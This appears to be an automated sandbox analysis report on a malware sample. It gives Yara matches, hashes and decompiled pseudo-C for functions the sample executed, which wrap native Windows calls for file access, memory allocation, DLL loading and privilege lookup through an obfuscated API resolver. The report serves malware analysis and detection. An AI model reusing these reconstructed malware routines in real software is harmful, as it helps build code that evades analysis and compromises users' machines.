                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: d2fc2d763adaaa50faf8328ef8561807945ae7850971290da7cdaaacfb6c84bf
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: 8501493604414EBBCF169E88CC42CEE3F26FB18354B588519FB5899231D377C9B1AB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            APIs
                            • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: !:A$b=A$b=A
                            • API String ID: 2738559852-704622139
                            • Opcode ID: 5f11b9a4f07551c04039a202ec8976f1c46010dff19bcbf64d31f324003d4795
                            • Instruction ID: d9f8cd198d05bfb0dbf1137ce7ac063a3907e1a06022e89a2ca1e2d7ee9c4d45
                            • Opcode Fuzzy Hash: 5f11b9a4f07551c04039a202ec8976f1c46010dff19bcbf64d31f324003d4795
                            • Instruction Fuzzy Hash: 7EF0E7B2200208ABCB14DF89DC81EEB77A9AF8C754F118249BA1D97291D630E8518BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 25%
                            			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, char _a40) {
                            				intOrPtr _t16;
                            				void* _t18;
                            				intOrPtr _t24;
                            				void* _t27;
                            				intOrPtr* _t28;
                            
                            				_t13 = _a4;
                            				_t28 = _a4 + 0xc48;
                            				E00418DD0(_t27, _a4, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                            				_t4 =  &_a40; // 0x413a21
                            				_t24 = _a28;
                            				_t16 = _a24;
                            				asm("sbb al, 0x51");
                            				_t12 =  &_a8; // 0x413d62
                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _t16, _t24, _a36,  *_t4); // executed
                            				return _t18;
                            			}









                            APIs
                            • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: !:A$b=A$b=A
                            • API String ID: 2738559852-704622139
                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: b=A
                            • API String ID: 2738559852-3743547364
                            • Opcode ID: 2f639de84dda8707260ae3967343960b60cd3538bbe756acbc4ca2ceab2e45fb
                            • Instruction ID: 5540c287bb30cb0a87f8cd44d48b6821f1f91ae2c3704d8e39907c10b98efcf6
                            • Opcode Fuzzy Hash: 2f639de84dda8707260ae3967343960b60cd3538bbe756acbc4ca2ceab2e45fb
                            • Instruction Fuzzy Hash: C6F030722001046BDB14DF98EC81DE77768EF88750F00855DFA1C8B281C634E95187A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 23%
                            			E004181CA(void* __ebx, void* __edi, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                            				void* __esi;
                            				void* __ebp;
                            				void* _t23;
                            				signed char _t29;
                            				intOrPtr* _t36;
                            
                            				_t35 = __edi + 1;
                            				if(__edi + 1 >= 0) {
                            					 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | _t29;
                            					asm("daa");
                            					_t3 = _t23 + 0xc3c; // 0xc64
                            					_t36 = _t3;
                            					E00418DD0(_t35);
                            					return  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _t23, _t36, _t29, 0);
                            				} else {
                            					asm("out dx, eax");
                            					asm("loope 0xe");
                            					__ebp = __esp;
                            					__eax = _a4;
                            					_t11 = __eax + 0xc40; // 0xc40
                            					__esi = _t11;
                            					E00418DD0(__edi, _a4, _t11,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28) = _a44;
                            					_a32 = _a20;
                            					__eax = _a8;
                            					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                            					__esi = __esi;
                            					__ebp = __ebp;
                            					return __eax;
                            				}
                            			}









                            APIs
                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: ee6a90a3af7f317368955cb15caf7a21470745238cd145d0c1ca90ce2b4d9dd1
                            • Instruction ID: f1c2b8e1b291d449183e3ed8341e88488e617c06c0be9db51ef9922168d6f56d
                            • Opcode Fuzzy Hash: ee6a90a3af7f317368955cb15caf7a21470745238cd145d0c1ca90ce2b4d9dd1
                            • Instruction Fuzzy Hash: 86110AB2600208ABCB14DF88DC85EEB37ADAF8C754F15864DBA0D97241DA34E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                            				char* _v8;
                            				struct _EXCEPTION_RECORD _v12;
                            				struct _OBJDIR_INFORMATION _v16;
                            				char _v536;
                            				void* _t15;
                            				struct _OBJDIR_INFORMATION _t17;
                            				struct _OBJDIR_INFORMATION _t18;
                            				void* _t30;
                            				void* _t31;
                            				void* _t32;
                            
                            				_v8 =  &_v536;
                            				_t15 = E0041AB60( &_v536,  &_v12, 0x104, _a8);
                            				_t31 = _t30 + 0xc;
                            				if(_t15 != 0) {
                            					_t17 = E0041AF80(__eflags, _v8);
                            					_t32 = _t31 + 4;
                            					__eflags = _t17;
                            					if(_t17 != 0) {
                            						E0041B200( &_v12, 0);
                            						_t32 = _t32 + 8;
                            					}
                            					_t18 = E00419310(_v8);
                            					_v16 = _t18;
                            					__eflags = _t18;
                            					if(_t18 == 0) {
                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                            						return _v16;
                            					}
                            					return _t18;
                            				} else {
                            					return _t15;
                            				}
                            			}














                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                            • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                            • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                            				long _t21;
                            				void* _t31;
                            
                            				_t3 = _a4 + 0xc40; // 0xc40
                            				E00418DD0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                            				return _t21;
                            			}






                            APIs
                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                            				long _t14;
                            				void* _t21;
                            
                            				_t3 = _a4 + 0xc60; // 0xca0
                            				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                            				return _t14;
                            			}






                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 64%
                            			E004183AB(void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                            				long _t15;
                            
                            				asm("popad");
                            				asm("sbb al, 0x4b");
                            				_t11 = _a4;
                            				_t4 = _t11 + 0xc60; // 0xca0
                            				E00418DD0(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                            				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                            				return _t15;
                            			}





                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: 06e8330814f503b86a013c7589584d05bb9310e3881c062e94060e3b1e2ccbd4
                            • Instruction ID: a0400cb2c8c5768009f514510cf3f587dd665fca07260f250f8e31a11c07757f
                            • Opcode Fuzzy Hash: 06e8330814f503b86a013c7589584d05bb9310e3881c062e94060e3b1e2ccbd4
                            • Instruction Fuzzy Hash: D5F0A0B1100149ABCB04DFA8DCC0CE7BBA8FF88250B15864DF94997202C630E815CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E004182FA(void* __eax, intOrPtr _a4, void* _a8) {
                            				long _t10;
                            				void* _t13;
                            
                            				asm("cld");
                            				_push(0x559a124d);
                            				_t7 = _a4;
                            				_t2 = _t7 + 0x10; // 0x300
                            				_t3 = _t7 + 0xc50; // 0x409753
                            				E00418DD0(_t13, _a4, _t3,  *_t2, 0, 0x2c);
                            				_t10 = NtClose(_a8); // executed
                            				return _t10;
                            			}






                            APIs
                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 8823069db33eae87361c693a5e29dc6685d6a416770808bd80f14b5a543e75c6
                            • Instruction ID: a7ac919464abc00324f4b07dc6d4193c11f854f0200288fb74daa4fd63f6de7d
                            • Opcode Fuzzy Hash: 8823069db33eae87361c693a5e29dc6685d6a416770808bd80f14b5a543e75c6
                            • Instruction Fuzzy Hash: 5DE0C232200318ABD710EFD4CC45ED77768EF44750F004099BE189B382D534EA0087E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00418300(intOrPtr _a4, void* _a8) {
                            				long _t8;
                            				void* _t11;
                            
                            				_t5 = _a4;
                            				_t2 = _t5 + 0x10; // 0x300
                            				_t3 = _t5 + 0xc50; // 0x409753
                            				E00418DD0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                            				_t8 = NtClose(_a8); // executed
                            				return _t8;
                            			}






                            APIs
                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 43a7ef2ce36bc2a15d164013d2216527106613abfed4cf26bc68f4db556f9dc4
                            • Instruction ID: 402676610ac8568d7abcee48d8c72ad35a5a4df04d43e9b32c4c6e5b9fb782b9
                            • Opcode Fuzzy Hash: 43a7ef2ce36bc2a15d164013d2216527106613abfed4cf26bc68f4db556f9dc4
                            • Instruction Fuzzy Hash: ED9002B521100402D540719944047460005A7D0346F91C021A5054555EC6998DE976A9
                            Uniqueness

                            Uniqueness Score: -1.00%


                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                            • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                            • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                            • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                            				void* _t10;
                            				void* _t15;
                            
                            				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                            				_t6 =  &_a8; // 0x413526
                            				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                            				return _t10;
                            			}






                            APIs
                            • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: &5A
                            • API String ID: 1279760036-1617645808
                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
                            				char _v67;
                            				char _v68;
                            				void* _t12;
                            				intOrPtr* _t13;
                            				int _t14;
                            				long _t21;
                            				intOrPtr* _t25;
                            				void* _t26;
                            				void* _t30;
                            
                            				_t30 = __eflags;
                            				_v68 = 0;
                            				E00419D30( &_v67, 0, 0x3f);
                            				E0041A910( &_v68, 3);
                            				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                            				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                            				_t25 = _t13;
                            				if(_t25 != 0) {
                            					_t21 = _a8;
                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                            					_t32 = _t14;
                            					if(_t14 == 0) {
                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                            					}
                            					return _t14;
                            				}
                            				return _t13;
                            			}













                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                            • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                            • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                            • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: e9134973141dd8d8f34bf740ef6071b5f709cae7b0e721a5e81f67bdb3ee3df0
                            • Instruction ID: d7da3ef0cf131cb83787a37ee2126da6621765998874519d2564d467d60f9997
                            • Opcode Fuzzy Hash: e9134973141dd8d8f34bf740ef6071b5f709cae7b0e721a5e81f67bdb3ee3df0
                            • Instruction Fuzzy Hash: EB01F9B52041442BD714DF95BC81DE77B98EF88660F04865EFD8D47243C834E455CB74
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                            				char _t10;
                            				void* _t15;
                            
                            				_t3 = _a4 + 0xc74; // 0xc74
                            				E00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                            				return _t10;
                            			}






                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                            				int _t10;
                            				void* _t15;
                            
                            				E00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                            				return _t10;
                            			}






                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004184D9(void* __ecx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                            				char _t11;
                            				void* _t18;
                            
                            				_t8 = _a4;
                            				_t4 = _t8 + 0xc74; // 0xc74
                            				E00418DD0(_t18, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                            				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
                            				return _t11;
                            			}






                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c20a14cca25623ce25995081ee9768666d2e4424e696adc3f3420bfbe80f5ea4
                            • Instruction ID: e098fc1e967335d09bbb1f72159d1bce7d6445ace89dd8cf1d4fc485bb2f68f1
                            • Opcode Fuzzy Hash: c20a14cca25623ce25995081ee9768666d2e4424e696adc3f3420bfbe80f5ea4
                            • Instruction Fuzzy Hash: 9CE026B41002845FDB10EF59D8C08AB7794AF803147108A4EEC6847606C131D86A8BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00418520(intOrPtr _a4, int _a8) {
                            				void* _t10;
                            
                            				_t5 = _a4;
                            				E00418DD0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                            				ExitProcess(_a8);
                            			}





                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 7e9caba1c1ca8359cebbd0f499fed4e8e31a9dac1947b2e8012fd708e75ab4af
                            • Instruction ID: c26b236d43ef1a1b13dfdeb6e9bb710c0781eb4059f635686fb2d157b05fb800
                            • Opcode Fuzzy Hash: 7e9caba1c1ca8359cebbd0f499fed4e8e31a9dac1947b2e8012fd708e75ab4af
                            • Instruction Fuzzy Hash: F6B09B719014D5C9DA11E7A45608717794077D0759F56C071D1020641B4778C095F6B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Strings
                            • an invalid address, %p, xrefs: 0139B4CF
                            • The resource is owned exclusively by thread %p, xrefs: 0139B374
                            • write to, xrefs: 0139B4A6
                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0139B314
                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0139B352
                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0139B484
                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0139B2F3
                            • The instruction at %p referenced memory at %p., xrefs: 0139B432
                            • *** then kb to get the faulting stack, xrefs: 0139B51C
                            • The critical section is owned by thread %p., xrefs: 0139B3B9
                            • a NULL pointer, xrefs: 0139B4E0
                            • *** Inpage error in %ws:%s, xrefs: 0139B418
                            • read from, xrefs: 0139B4AD, 0139B4B2
                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0139B2DC
                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0139B53F
                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0139B3D6
                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0139B305
                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0139B39B
                            • Go determine why that thread has not released the critical section., xrefs: 0139B3C5
                            • The instruction at %p tried to %s , xrefs: 0139B4B6
                            • *** enter .exr %p for the exception record, xrefs: 0139B4F1
                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0139B476
                            • The resource is owned shared by %d threads, xrefs: 0139B37E
                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0139B38F
                            • <unknown>, xrefs: 0139B27E, 0139B2D1, 0139B350, 0139B399, 0139B417, 0139B48E
                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0139B47D
                            • *** An Access Violation occurred in %ws:%s, xrefs: 0139B48F
                            • *** enter .cxr %p for the context, xrefs: 0139B50D
                            • This failed because of error %Ix., xrefs: 0139B446
                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0139B323
                            Memory Dump Source
